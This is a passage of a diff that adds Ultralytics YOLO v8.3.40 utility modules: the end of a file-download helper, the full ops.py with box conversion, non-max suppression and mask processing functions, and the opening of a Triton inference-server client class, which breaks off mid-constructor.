unzipping. Defaults to False. 
+ + Example: + ```python + download("https://ultralytics.com/assets/example.zip", dir="path/to/dir", unzip=True) + ``` + """ + dir = Path(dir) + dir.mkdir(parents=True, exist_ok=True) # make directory + if threads > 1: + with ThreadPool(threads) as pool: + pool.map( + lambda x: safe_download( + url=x[0], + dir=x[1], + unzip=unzip, + delete=delete, + curl=curl, + retry=retry, + exist_ok=exist_ok, + progress=threads <= 1, + ), + zip(url, repeat(dir)), + ) + pool.close() + pool.join() + else: + for u in [url] if isinstance(url, (str, Path)) else url: + safe_download(url=u, dir=dir, unzip=unzip, delete=delete, curl=curl, retry=retry, exist_ok=exist_ok) diff --git a/2024.ultralytics/v8.3.40/utils/ops.py b/2024.ultralytics/v8.3.40/utils/ops.py new file mode 100644 index 0000000..ac53546 --- /dev/null +++ b/2024.ultralytics/v8.3.40/utils/ops.py @@ -0,0 +1,839 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import contextlib +import math +import re +import time + +import cv2 +import numpy as np +import torch +import torch.nn.functional as F + +from ultralytics.utils import LOGGER +from ultralytics.utils.metrics import batch_probiou + + +class Profile(contextlib.ContextDecorator): + """ + YOLOv8 Profile class. Use as a decorator with @Profile() or as a context manager with 'with Profile():'. + + Example: + ```python + from ultralytics.utils.ops import Profile + + with Profile(device=device) as dt: + pass # slow operation here + + print(dt) # prints "Elapsed time is 9.5367431640625e-07 s" + ``` + """ + + def __init__(self, t=0.0, device: torch.device = None): + """ + Initialize the Profile class. + + Args: + t (float): Initial time. Defaults to 0.0. + device (torch.device): Devices used for model inference. Defaults to None (cpu). 
+ """ + self.t = t + self.device = device + self.cuda = bool(device and str(device).startswith("cuda")) + + def __enter__(self): + """Start timing.""" + self.start = self.time() + return self + + def __exit__(self, type, value, traceback): # noqa + """Stop timing.""" + self.dt = self.time() - self.start # delta-time + self.t += self.dt # accumulate dt + + def __str__(self): + """Returns a human-readable string representing the accumulated elapsed time in the profiler.""" + return f"Elapsed time is {self.t} s" + + def time(self): + """Get current time.""" + if self.cuda: + torch.cuda.synchronize(self.device) + return time.time() + + +def segment2box(segment, width=640, height=640): + """ + Convert 1 segment label to 1 box label, applying inside-image constraint, i.e. (xy1, xy2, ...) to (xyxy). + + Args: + segment (torch.Tensor): the segment label + width (int): the width of the image. Defaults to 640 + height (int): The height of the image. Defaults to 640 + + Returns: + (np.ndarray): the minimum and maximum x and y values of the segment. + """ + x, y = segment.T # segment xy + x = x.clip(0, width) + y = y.clip(0, height) + return ( + np.array([x.min(), y.min(), x.max(), y.max()], dtype=segment.dtype) + if any(x) + else np.zeros(4, dtype=segment.dtype) + ) # xyxy + + +def scale_boxes(img1_shape, boxes, img0_shape, ratio_pad=None, padding=True, xywh=False): + """ + Rescales bounding boxes (in the format of xyxy by default) from the shape of the image they were originally + specified in (img1_shape) to the shape of a different image (img0_shape). + + Args: + img1_shape (tuple): The shape of the image that the bounding boxes are for, in the format of (height, width). + boxes (torch.Tensor): the bounding boxes of the objects in the image, in the format of (x1, y1, x2, y2) + img0_shape (tuple): the shape of the target image, in the format of (height, width). + ratio_pad (tuple): a tuple of (ratio, pad) for scaling the boxes. 
If not provided, the ratio and pad will be + calculated based on the size difference between the two images. + padding (bool): If True, assuming the boxes is based on image augmented by yolo style. If False then do regular + rescaling. + xywh (bool): The box format is xywh or not, default=False. + + Returns: + boxes (torch.Tensor): The scaled bounding boxes, in the format of (x1, y1, x2, y2) + """ + if ratio_pad is None: # calculate from img0_shape + gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new + pad = ( + round((img1_shape[1] - img0_shape[1] * gain) / 2 - 0.1), + round((img1_shape[0] - img0_shape[0] * gain) / 2 - 0.1), + ) # wh padding + else: + gain = ratio_pad[0][0] + pad = ratio_pad[1] + + if padding: + boxes[..., 0] -= pad[0] # x padding + boxes[..., 1] -= pad[1] # y padding + if not xywh: + boxes[..., 2] -= pad[0] # x padding + boxes[..., 3] -= pad[1] # y padding + boxes[..., :4] /= gain + return clip_boxes(boxes, img0_shape) + + +def make_divisible(x, divisor): + """ + Returns the nearest number that is divisible by the given divisor. + + Args: + x (int): The number to make divisible. + divisor (int | torch.Tensor): The divisor. + + Returns: + (int): The nearest number divisible by the divisor. + """ + if isinstance(divisor, torch.Tensor): + divisor = int(divisor.max()) # to int + return math.ceil(x / divisor) * divisor + + +def nms_rotated(boxes, scores, threshold=0.45): + """ + NMS for oriented bounding boxes using probiou and fast-nms. + + Args: + boxes (torch.Tensor): Rotated bounding boxes, shape (N, 5), format xywhr. + scores (torch.Tensor): Confidence scores, shape (N,). + threshold (float, optional): IoU threshold. Defaults to 0.45. + + Returns: + (torch.Tensor): Indices of boxes to keep after NMS. 
+ """ + if len(boxes) == 0: + return np.empty((0,), dtype=np.int8) + sorted_idx = torch.argsort(scores, descending=True) + boxes = boxes[sorted_idx] + ious = batch_probiou(boxes, boxes).triu_(diagonal=1) + pick = torch.nonzero(ious.max(dim=0)[0] < threshold).squeeze_(-1) + return sorted_idx[pick] + + +def non_max_suppression( + prediction, + conf_thres=0.25, + iou_thres=0.45, + classes=None, + agnostic=False, + multi_label=False, + labels=(), + max_det=300, + nc=0, # number of classes (optional) + max_time_img=0.05, + max_nms=30000, + max_wh=7680, + in_place=True, + rotated=False, +): + """ + Perform non-maximum suppression (NMS) on a set of boxes, with support for masks and multiple labels per box. + + Args: + prediction (torch.Tensor): A tensor of shape (batch_size, num_classes + 4 + num_masks, num_boxes) + containing the predicted boxes, classes, and masks. The tensor should be in the format + output by a model, such as YOLO. + conf_thres (float): The confidence threshold below which boxes will be filtered out. + Valid values are between 0.0 and 1.0. + iou_thres (float): The IoU threshold below which boxes will be filtered out during NMS. + Valid values are between 0.0 and 1.0. + classes (List[int]): A list of class indices to consider. If None, all classes will be considered. + agnostic (bool): If True, the model is agnostic to the number of classes, and all + classes will be considered as one. + multi_label (bool): If True, each box may have multiple labels. + labels (List[List[Union[int, float, torch.Tensor]]]): A list of lists, where each inner + list contains the apriori labels for a given image. The list should be in the format + output by a dataloader, with each label being a tuple of (class_index, x1, y1, x2, y2). + max_det (int): The maximum number of boxes to keep after NMS. + nc (int, optional): The number of classes output by the model. Any indices after this will be considered masks. 
+ max_time_img (float): The maximum time (seconds) for processing one image. + max_nms (int): The maximum number of boxes into torchvision.ops.nms(). + max_wh (int): The maximum box width and height in pixels. + in_place (bool): If True, the input prediction tensor will be modified in place. + rotated (bool): If Oriented Bounding Boxes (OBB) are being passed for NMS. + + Returns: + (List[torch.Tensor]): A list of length batch_size, where each element is a tensor of + shape (num_boxes, 6 + num_masks) containing the kept boxes, with columns + (x1, y1, x2, y2, confidence, class, mask1, mask2, ...). + """ + import torchvision # scope for faster 'import ultralytics' + + # Checks + assert 0 <= conf_thres <= 1, f"Invalid Confidence threshold {conf_thres}, valid values are between 0.0 and 1.0" + assert 0 <= iou_thres <= 1, f"Invalid IoU {iou_thres}, valid values are between 0.0 and 1.0" + if isinstance(prediction, (list, tuple)): # YOLOv8 model in validation model, output = (inference_out, loss_out) + prediction = prediction[0] # select only inference output + if classes is not None: + classes = torch.tensor(classes, device=prediction.device) + + if prediction.shape[-1] == 6: # end-to-end model (BNC, i.e. 1,300,6) + output = [pred[pred[:, 4] > conf_thres][:max_det] for pred in prediction] + if classes is not None: + output = [pred[(pred[:, 5:6] == classes).any(1)] for pred in output] + return output + + bs = prediction.shape[0] # batch size (BCN, i.e. 
1,84,6300) + nc = nc or (prediction.shape[1] - 4) # number of classes + nm = prediction.shape[1] - nc - 4 # number of masks + mi = 4 + nc # mask start index + xc = prediction[:, 4:mi].amax(1) > conf_thres # candidates + + # Settings + # min_wh = 2 # (pixels) minimum box width and height + time_limit = 2.0 + max_time_img * bs # seconds to quit after + multi_label &= nc > 1 # multiple labels per box (adds 0.5ms/img) + + prediction = prediction.transpose(-1, -2) # shape(1,84,6300) to shape(1,6300,84) + if not rotated: + if in_place: + prediction[..., :4] = xywh2xyxy(prediction[..., :4]) # xywh to xyxy + else: + prediction = torch.cat((xywh2xyxy(prediction[..., :4]), prediction[..., 4:]), dim=-1) # xywh to xyxy + + t = time.time() + output = [torch.zeros((0, 6 + nm), device=prediction.device)] * bs + for xi, x in enumerate(prediction): # image index, image inference + # Apply constraints + # x[((x[:, 2:4] < min_wh) | (x[:, 2:4] > max_wh)).any(1), 4] = 0 # width-height + x = x[xc[xi]] # confidence + + # Cat apriori labels if autolabelling + if labels and len(labels[xi]) and not rotated: + lb = labels[xi] + v = torch.zeros((len(lb), nc + nm + 4), device=x.device) + v[:, :4] = xywh2xyxy(lb[:, 1:5]) # box + v[range(len(lb)), lb[:, 0].long() + 4] = 1.0 # cls + x = torch.cat((x, v), 0) + + # If none remain process next image + if not x.shape[0]: + continue + + # Detections matrix nx6 (xyxy, conf, cls) + box, cls, mask = x.split((4, nc, nm), 1) + + if multi_label: + i, j = torch.where(cls > conf_thres) + x = torch.cat((box[i], x[i, 4 + j, None], j[:, None].float(), mask[i]), 1) + else: # best class only + conf, j = cls.max(1, keepdim=True) + x = torch.cat((box, conf, j.float(), mask), 1)[conf.view(-1) > conf_thres] + + # Filter by class + if classes is not None: + x = x[(x[:, 5:6] == classes).any(1)] + + # Check shape + n = x.shape[0] # number of boxes + if not n: # no boxes + continue + if n > max_nms: # excess boxes + x = x[x[:, 4].argsort(descending=True)[:max_nms]] # sort 
by confidence and remove excess boxes + + # Batched NMS + c = x[:, 5:6] * (0 if agnostic else max_wh) # classes + scores = x[:, 4] # scores + if rotated: + boxes = torch.cat((x[:, :2] + c, x[:, 2:4], x[:, -1:]), dim=-1) # xywhr + i = nms_rotated(boxes, scores, iou_thres) + else: + boxes = x[:, :4] + c # boxes (offset by class) + i = torchvision.ops.nms(boxes, scores, iou_thres) # NMS + i = i[:max_det] # limit detections + + # # Experimental + # merge = False # use merge-NMS + # if merge and (1 < n < 3E3): # Merge NMS (boxes merged using weighted mean) + # # Update boxes as boxes(i,4) = weights(i,n) * boxes(n,4) + # from .metrics import box_iou + # iou = box_iou(boxes[i], boxes) > iou_thres # IoU matrix + # weights = iou * scores[None] # box weights + # x[i, :4] = torch.mm(weights, x[:, :4]).float() / weights.sum(1, keepdim=True) # merged boxes + # redundant = True # require redundant detections + # if redundant: + # i = i[iou.sum(1) > 1] # require redundancy + + output[xi] = x[i] + if (time.time() - t) > time_limit: + LOGGER.warning(f"WARNING ⚠️ NMS time limit {time_limit:.3f}s exceeded") + break # time limit exceeded + + return output + + +def clip_boxes(boxes, shape): + """ + Takes a list of bounding boxes and a shape (height, width) and clips the bounding boxes to the shape. + + Args: + boxes (torch.Tensor): The bounding boxes to clip. + shape (tuple): The shape of the image. + + Returns: + (torch.Tensor | numpy.ndarray): The clipped boxes. 
+ """ + if isinstance(boxes, torch.Tensor): # faster individually (WARNING: inplace .clamp_() Apple MPS bug) + boxes[..., 0] = boxes[..., 0].clamp(0, shape[1]) # x1 + boxes[..., 1] = boxes[..., 1].clamp(0, shape[0]) # y1 + boxes[..., 2] = boxes[..., 2].clamp(0, shape[1]) # x2 + boxes[..., 3] = boxes[..., 3].clamp(0, shape[0]) # y2 + else: # np.array (faster grouped) + boxes[..., [0, 2]] = boxes[..., [0, 2]].clip(0, shape[1]) # x1, x2 + boxes[..., [1, 3]] = boxes[..., [1, 3]].clip(0, shape[0]) # y1, y2 + return boxes + + +def clip_coords(coords, shape): + """ + Clip line coordinates to the image boundaries. + + Args: + coords (torch.Tensor | numpy.ndarray): A list of line coordinates. + shape (tuple): A tuple of integers representing the size of the image in the format (height, width). + + Returns: + (torch.Tensor | numpy.ndarray): Clipped coordinates + """ + if isinstance(coords, torch.Tensor): # faster individually (WARNING: inplace .clamp_() Apple MPS bug) + coords[..., 0] = coords[..., 0].clamp(0, shape[1]) # x + coords[..., 1] = coords[..., 1].clamp(0, shape[0]) # y + else: # np.array (faster grouped) + coords[..., 0] = coords[..., 0].clip(0, shape[1]) # x + coords[..., 1] = coords[..., 1].clip(0, shape[0]) # y + return coords + + +def scale_image(masks, im0_shape, ratio_pad=None): + """ + Takes a mask, and resizes it to the original image size. + + Args: + masks (np.ndarray): Resized and padded masks/images, [h, w, num]/[h, w, 3]. + im0_shape (tuple): The original image shape. + ratio_pad (tuple): The ratio of the padding to the original image. + + Returns: + masks (np.ndarray): The masks that are being returned with shape [h, w, num]. 
+ """ + # Rescale coordinates (xyxy) from im1_shape to im0_shape + im1_shape = masks.shape + if im1_shape[:2] == im0_shape[:2]: + return masks + if ratio_pad is None: # calculate from im0_shape + gain = min(im1_shape[0] / im0_shape[0], im1_shape[1] / im0_shape[1]) # gain = old / new + pad = (im1_shape[1] - im0_shape[1] * gain) / 2, (im1_shape[0] - im0_shape[0] * gain) / 2 # wh padding + else: + # gain = ratio_pad[0][0] + pad = ratio_pad[1] + top, left = int(pad[1]), int(pad[0]) # y, x + bottom, right = int(im1_shape[0] - pad[1]), int(im1_shape[1] - pad[0]) + + if len(masks.shape) < 2: + raise ValueError(f'"len of masks shape" should be 2 or 3, but got {len(masks.shape)}') + masks = masks[top:bottom, left:right] + masks = cv2.resize(masks, (im0_shape[1], im0_shape[0])) + if len(masks.shape) == 2: + masks = masks[:, :, None] + + return masks + + +def xyxy2xywh(x): + """ + Convert bounding box coordinates from (x1, y1, x2, y2) format to (x, y, width, height) format where (x1, y1) is the + top-left corner and (x2, y2) is the bottom-right corner. + + Args: + x (np.ndarray | torch.Tensor): The input bounding box coordinates in (x1, y1, x2, y2) format. + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in (x, y, width, height) format. + """ + assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}" + y = torch.empty_like(x) if isinstance(x, torch.Tensor) else np.empty_like(x) # faster than clone/copy + y[..., 0] = (x[..., 0] + x[..., 2]) / 2 # x center + y[..., 1] = (x[..., 1] + x[..., 3]) / 2 # y center + y[..., 2] = x[..., 2] - x[..., 0] # width + y[..., 3] = x[..., 3] - x[..., 1] # height + return y + + +def xywh2xyxy(x): + """ + Convert bounding box coordinates from (x, y, width, height) format to (x1, y1, x2, y2) format where (x1, y1) is the + top-left corner and (x2, y2) is the bottom-right corner. Note: ops per 2 channels faster than per channel. 
+ + Args: + x (np.ndarray | torch.Tensor): The input bounding box coordinates in (x, y, width, height) format. + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in (x1, y1, x2, y2) format. + """ + assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}" + y = torch.empty_like(x) if isinstance(x, torch.Tensor) else np.empty_like(x) # faster than clone/copy + xy = x[..., :2] # centers + wh = x[..., 2:] / 2 # half width-height + y[..., :2] = xy - wh # top left xy + y[..., 2:] = xy + wh # bottom right xy + return y + + +def xywhn2xyxy(x, w=640, h=640, padw=0, padh=0): + """ + Convert normalized bounding box coordinates to pixel coordinates. + + Args: + x (np.ndarray | torch.Tensor): The bounding box coordinates. + w (int): Width of the image. Defaults to 640 + h (int): Height of the image. Defaults to 640 + padw (int): Padding width. Defaults to 0 + padh (int): Padding height. Defaults to 0 + Returns: + y (np.ndarray | torch.Tensor): The coordinates of the bounding box in the format [x1, y1, x2, y2] where + x1,y1 is the top-left corner, x2,y2 is the bottom-right corner of the bounding box. + """ + assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}" + y = torch.empty_like(x) if isinstance(x, torch.Tensor) else np.empty_like(x) # faster than clone/copy + y[..., 0] = w * (x[..., 0] - x[..., 2] / 2) + padw # top left x + y[..., 1] = h * (x[..., 1] - x[..., 3] / 2) + padh # top left y + y[..., 2] = w * (x[..., 0] + x[..., 2] / 2) + padw # bottom right x + y[..., 3] = h * (x[..., 1] + x[..., 3] / 2) + padh # bottom right y + return y + + +def xyxy2xywhn(x, w=640, h=640, clip=False, eps=0.0): + """ + Convert bounding box coordinates from (x1, y1, x2, y2) format to (x, y, width, height, normalized) format. x, y, + width and height are normalized to image dimensions. + + Args: + x (np.ndarray | torch.Tensor): The input bounding box coordinates in (x1, y1, x2, y2) format. 
+ w (int): The width of the image. Defaults to 640 + h (int): The height of the image. Defaults to 640 + clip (bool): If True, the boxes will be clipped to the image boundaries. Defaults to False + eps (float): The minimum value of the box's width and height. Defaults to 0.0 + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in (x, y, width, height, normalized) format + """ + if clip: + x = clip_boxes(x, (h - eps, w - eps)) + assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}" + y = torch.empty_like(x) if isinstance(x, torch.Tensor) else np.empty_like(x) # faster than clone/copy + y[..., 0] = ((x[..., 0] + x[..., 2]) / 2) / w # x center + y[..., 1] = ((x[..., 1] + x[..., 3]) / 2) / h # y center + y[..., 2] = (x[..., 2] - x[..., 0]) / w # width + y[..., 3] = (x[..., 3] - x[..., 1]) / h # height + return y + + +def xywh2ltwh(x): + """ + Convert the bounding box format from [x, y, w, h] to [x1, y1, w, h], where x1, y1 are the top-left coordinates. + + Args: + x (np.ndarray | torch.Tensor): The input tensor with the bounding box coordinates in the xywh format + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in the xyltwh format + """ + y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) + y[..., 0] = x[..., 0] - x[..., 2] / 2 # top left x + y[..., 1] = x[..., 1] - x[..., 3] / 2 # top left y + return y + + +def xyxy2ltwh(x): + """ + Convert nx4 bounding boxes from [x1, y1, x2, y2] to [x1, y1, w, h], where xy1=top-left, xy2=bottom-right. + + Args: + x (np.ndarray | torch.Tensor): The input tensor with the bounding boxes coordinates in the xyxy format + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in the xyltwh format. 
+ """ + y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) + y[..., 2] = x[..., 2] - x[..., 0] # width + y[..., 3] = x[..., 3] - x[..., 1] # height + return y + + +def ltwh2xywh(x): + """ + Convert nx4 boxes from [x1, y1, w, h] to [x, y, w, h] where xy1=top-left, xy=center. + + Args: + x (torch.Tensor): the input tensor + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in the xywh format. + """ + y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) + y[..., 0] = x[..., 0] + x[..., 2] / 2 # center x + y[..., 1] = x[..., 1] + x[..., 3] / 2 # center y + return y + + +def xyxyxyxy2xywhr(x): + """ + Convert batched Oriented Bounding Boxes (OBB) from [xy1, xy2, xy3, xy4] to [xywh, rotation]. Rotation values are + returned in radians from 0 to pi/2. + + Args: + x (numpy.ndarray | torch.Tensor): Input box corners [xy1, xy2, xy3, xy4] of shape (n, 8). + + Returns: + (numpy.ndarray | torch.Tensor): Converted data in [cx, cy, w, h, rotation] format of shape (n, 5). + """ + is_torch = isinstance(x, torch.Tensor) + points = x.cpu().numpy() if is_torch else x + points = points.reshape(len(x), -1, 2) + rboxes = [] + for pts in points: + # NOTE: Use cv2.minAreaRect to get accurate xywhr, + # especially some objects are cut off by augmentations in dataloader. + (cx, cy), (w, h), angle = cv2.minAreaRect(pts) + rboxes.append([cx, cy, w, h, angle / 180 * np.pi]) + return torch.tensor(rboxes, device=x.device, dtype=x.dtype) if is_torch else np.asarray(rboxes) + + +def xywhr2xyxyxyxy(x): + """ + Convert batched Oriented Bounding Boxes (OBB) from [xywh, rotation] to [xy1, xy2, xy3, xy4]. Rotation values should + be in radians from 0 to pi/2. + + Args: + x (numpy.ndarray | torch.Tensor): Boxes in [cx, cy, w, h, rotation] format of shape (n, 5) or (b, n, 5). + + Returns: + (numpy.ndarray | torch.Tensor): Converted corner points of shape (n, 4, 2) or (b, n, 4, 2). 
+ """ + cos, sin, cat, stack = ( + (torch.cos, torch.sin, torch.cat, torch.stack) + if isinstance(x, torch.Tensor) + else (np.cos, np.sin, np.concatenate, np.stack) + ) + + ctr = x[..., :2] + w, h, angle = (x[..., i : i + 1] for i in range(2, 5)) + cos_value, sin_value = cos(angle), sin(angle) + vec1 = [w / 2 * cos_value, w / 2 * sin_value] + vec2 = [-h / 2 * sin_value, h / 2 * cos_value] + vec1 = cat(vec1, -1) + vec2 = cat(vec2, -1) + pt1 = ctr + vec1 + vec2 + pt2 = ctr + vec1 - vec2 + pt3 = ctr - vec1 - vec2 + pt4 = ctr - vec1 + vec2 + return stack([pt1, pt2, pt3, pt4], -2) + + +def ltwh2xyxy(x): + """ + It converts the bounding box from [x1, y1, w, h] to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right. + + Args: + x (np.ndarray | torch.Tensor): the input image + + Returns: + y (np.ndarray | torch.Tensor): the xyxy coordinates of the bounding boxes. + """ + y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) + y[..., 2] = x[..., 2] + x[..., 0] # width + y[..., 3] = x[..., 3] + x[..., 1] # height + return y + + +def segments2boxes(segments): + """ + It converts segment labels to box labels, i.e. (cls, xy1, xy2, ...) to (cls, xywh). + + Args: + segments (list): list of segments, each segment is a list of points, each point is a list of x, y coordinates + + Returns: + (np.ndarray): the xywh coordinates of the bounding boxes. + """ + boxes = [] + for s in segments: + x, y = s.T # segment xy + boxes.append([x.min(), y.min(), x.max(), y.max()]) # cls, xyxy + return xyxy2xywh(np.array(boxes)) # cls, xywh + + +def resample_segments(segments, n=1000): + """ + Inputs a list of segments (n,2) and returns a list of segments (n,2) up-sampled to n points each. + + Args: + segments (list): a list of (n,2) arrays, where n is the number of points in the segment. + n (int): number of points to resample the segment to. Defaults to 1000 + + Returns: + segments (list): the resampled segments. 
+ """ + for i, s in enumerate(segments): + s = np.concatenate((s, s[0:1, :]), axis=0) + x = np.linspace(0, len(s) - 1, n) + xp = np.arange(len(s)) + segments[i] = ( + np.concatenate([np.interp(x, xp, s[:, i]) for i in range(2)], dtype=np.float32).reshape(2, -1).T + ) # segment xy + return segments + + +def crop_mask(masks, boxes): + """ + It takes a mask and a bounding box, and returns a mask that is cropped to the bounding box. + + Args: + masks (torch.Tensor): [n, h, w] tensor of masks + boxes (torch.Tensor): [n, 4] tensor of bbox coordinates in relative point form + + Returns: + (torch.Tensor): The masks are being cropped to the bounding box. + """ + _, h, w = masks.shape + x1, y1, x2, y2 = torch.chunk(boxes[:, :, None], 4, 1) # x1 shape(n,1,1) + r = torch.arange(w, device=masks.device, dtype=x1.dtype)[None, None, :] # rows shape(1,1,w) + c = torch.arange(h, device=masks.device, dtype=x1.dtype)[None, :, None] # cols shape(1,h,1) + + return masks * ((r >= x1) * (r < x2) * (c >= y1) * (c < y2)) + + +def process_mask(protos, masks_in, bboxes, shape, upsample=False): + """ + Apply masks to bounding boxes using the output of the mask head. + + Args: + protos (torch.Tensor): A tensor of shape [mask_dim, mask_h, mask_w]. + masks_in (torch.Tensor): A tensor of shape [n, mask_dim], where n is the number of masks after NMS. + bboxes (torch.Tensor): A tensor of shape [n, 4], where n is the number of masks after NMS. + shape (tuple): A tuple of integers representing the size of the input image in the format (h, w). + upsample (bool): A flag to indicate whether to upsample the mask to the original image size. Default is False. + + Returns: + (torch.Tensor): A binary mask tensor of shape [n, h, w], where n is the number of masks after NMS, and h and w + are the height and width of the input image. The mask is applied to the bounding boxes. 
+ """ + c, mh, mw = protos.shape # CHW + ih, iw = shape + masks = (masks_in @ protos.float().view(c, -1)).view(-1, mh, mw) # CHW + width_ratio = mw / iw + height_ratio = mh / ih + + downsampled_bboxes = bboxes.clone() + downsampled_bboxes[:, 0] *= width_ratio + downsampled_bboxes[:, 2] *= width_ratio + downsampled_bboxes[:, 3] *= height_ratio + downsampled_bboxes[:, 1] *= height_ratio + + masks = crop_mask(masks, downsampled_bboxes) # CHW + if upsample: + masks = F.interpolate(masks[None], shape, mode="bilinear", align_corners=False)[0] # CHW + return masks.gt_(0.0) + + +def process_mask_native(protos, masks_in, bboxes, shape): + """ + It takes the output of the mask head, and crops it after upsampling to the bounding boxes. + + Args: + protos (torch.Tensor): [mask_dim, mask_h, mask_w] + masks_in (torch.Tensor): [n, mask_dim], n is number of masks after nms. + bboxes (torch.Tensor): [n, 4], n is number of masks after nms. + shape (tuple): The size of the input image (h,w). + + Returns: + masks (torch.Tensor): The returned masks with dimensions [h, w, n]. + """ + c, mh, mw = protos.shape # CHW + masks = (masks_in @ protos.float().view(c, -1)).view(-1, mh, mw) + masks = scale_masks(masks[None], shape)[0] # CHW + masks = crop_mask(masks, bboxes) # CHW + return masks.gt_(0.0) + + +def scale_masks(masks, shape, padding=True): + """ + Rescale segment masks to shape. + + Args: + masks (torch.Tensor): (N, C, H, W). + shape (tuple): Height and width. + padding (bool): If True, assuming the boxes is based on image augmented by yolo style. If False then do regular + rescaling. 
+ """ + mh, mw = masks.shape[2:] + gain = min(mh / shape[0], mw / shape[1]) # gain = old / new + pad = [mw - shape[1] * gain, mh - shape[0] * gain] # wh padding + if padding: + pad[0] /= 2 + pad[1] /= 2 + top, left = (int(pad[1]), int(pad[0])) if padding else (0, 0) # y, x + bottom, right = (int(mh - pad[1]), int(mw - pad[0])) + masks = masks[..., top:bottom, left:right] + + masks = F.interpolate(masks, shape, mode="bilinear", align_corners=False) # NCHW + return masks + + +def scale_coords(img1_shape, coords, img0_shape, ratio_pad=None, normalize=False, padding=True): + """ + Rescale segment coordinates (xy) from img1_shape to img0_shape. + + Args: + img1_shape (tuple): The shape of the image that the coords are from. + coords (torch.Tensor): the coords to be scaled of shape n,2. + img0_shape (tuple): the shape of the image that the segmentation is being applied to. + ratio_pad (tuple): the ratio of the image size to the padded image size. + normalize (bool): If True, the coordinates will be normalized to the range [0, 1]. Defaults to False. + padding (bool): If True, assuming the boxes is based on image augmented by yolo style. If False then do regular + rescaling. + + Returns: + coords (torch.Tensor): The scaled coordinates. + """ + if ratio_pad is None: # calculate from img0_shape + gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new + pad = (img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2 # wh padding + else: + gain = ratio_pad[0][0] + pad = ratio_pad[1] + + if padding: + coords[..., 0] -= pad[0] # x padding + coords[..., 1] -= pad[1] # y padding + coords[..., 0] /= gain + coords[..., 1] /= gain + coords = clip_coords(coords, img0_shape) + if normalize: + coords[..., 0] /= img0_shape[1] # width + coords[..., 1] /= img0_shape[0] # height + return coords + + +def regularize_rboxes(rboxes): + """ + Regularize rotated boxes in range [0, pi/2]. 
+ + Args: + rboxes (torch.Tensor): Input boxes of shape(N, 5) in xywhr format. + + Returns: + (torch.Tensor): The regularized boxes. + """ + x, y, w, h, t = rboxes.unbind(dim=-1) + # Swap edge and angle if h >= w + w_ = torch.where(w > h, w, h) + h_ = torch.where(w > h, h, w) + t = torch.where(w > h, t, t + math.pi / 2) % math.pi + return torch.stack([x, y, w_, h_, t], dim=-1) # regularized boxes + + +def masks2segments(masks, strategy="all"): + """ + It takes a list of masks(n,h,w) and returns a list of segments(n,xy). + + Args: + masks (torch.Tensor): the output of the model, which is a tensor of shape (batch_size, 160, 160) + strategy (str): 'all' or 'largest'. Defaults to all + + Returns: + segments (List): list of segment masks + """ + from ultralytics.data.converter import merge_multi_segment + + segments = [] + for x in masks.int().cpu().numpy().astype("uint8"): + c = cv2.findContours(x, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[0] + if c: + if strategy == "all": # merge and concatenate all segments + c = ( + np.concatenate(merge_multi_segment([x.reshape(-1, 2) for x in c])) + if len(c) > 1 + else c[0].reshape(-1, 2) + ) + elif strategy == "largest": # select largest segment + c = np.array(c[np.array([len(x) for x in c]).argmax()]).reshape(-1, 2) + else: + c = np.zeros((0, 2)) # no segments found + segments.append(c.astype("float32")) + return segments + + +def convert_torch2numpy_batch(batch: torch.Tensor) -> np.ndarray: + """ + Convert a batch of FP32 torch tensors (0.0-1.0) to a NumPy uint8 array (0-255), changing from BCHW to BHWC layout. + + Args: + batch (torch.Tensor): Input tensor batch of shape (Batch, Channels, Height, Width) and dtype torch.float32. + + Returns: + (np.ndarray): Output NumPy array batch of shape (Batch, Height, Width, Channels) and dtype uint8. 
class TritonRemoteModel:
    """
    Thin client wrapper around a model served by a remote Triton Inference Server.

    Attributes:
        endpoint (str): The name of the model on the Triton server.
        url (str): The URL of the Triton server.
        triton_client: The Triton client (either HTTP or gRPC).
        InferInput: The input class for the Triton client.
        InferRequestedOutput: The output request class for the Triton client.
        input_formats (List[str]): The data types of the model inputs.
        np_input_formats (List[type]): The numpy data types of the model inputs.
        input_names (List[str]): The names of the model inputs.
        output_names (List[str]): The names of the model outputs.
    """

    def __init__(self, url: str, endpoint: str = "", scheme: str = ""):
        """
        Connect to the Triton server and read the model's input/output configuration.

        When neither `endpoint` nor `scheme` is given, all three values are parsed from `url`, which is then expected
        to look like 'scheme://netloc/endpoint/...': the scheme selects the client, the netloc becomes the server
        address and the first path component becomes the model name.

        Args:
            url (str): The URL of the Triton server.
            endpoint (str): The name of the model on the Triton server.
            scheme (str): The communication scheme ('http' or 'grpc'). Any value other than 'http' selects gRPC.
        """
        if not (endpoint or scheme):  # nothing passed explicitly, so derive everything from the URL string
            parsed = urlsplit(url)
            endpoint = parsed.path.strip("/").split("/")[0]
            scheme = parsed.scheme
            url = parsed.netloc

        self.endpoint = endpoint
        self.url = url

        # Pick the client implementation that matches the communication scheme
        use_http = scheme == "http"
        if use_http:
            import tritonclient.http as client  # noqa
        else:
            import tritonclient.grpc as client  # noqa

        self.triton_client = client.InferenceServerClient(url=self.url, verbose=False, ssl=False)
        if use_http:
            config = self.triton_client.get_model_config(endpoint)
        else:
            config = self.triton_client.get_model_config(endpoint, as_json=True)["config"]

        # Keep outputs in alphabetical name order, i.e. 'output0', 'output1', etc.
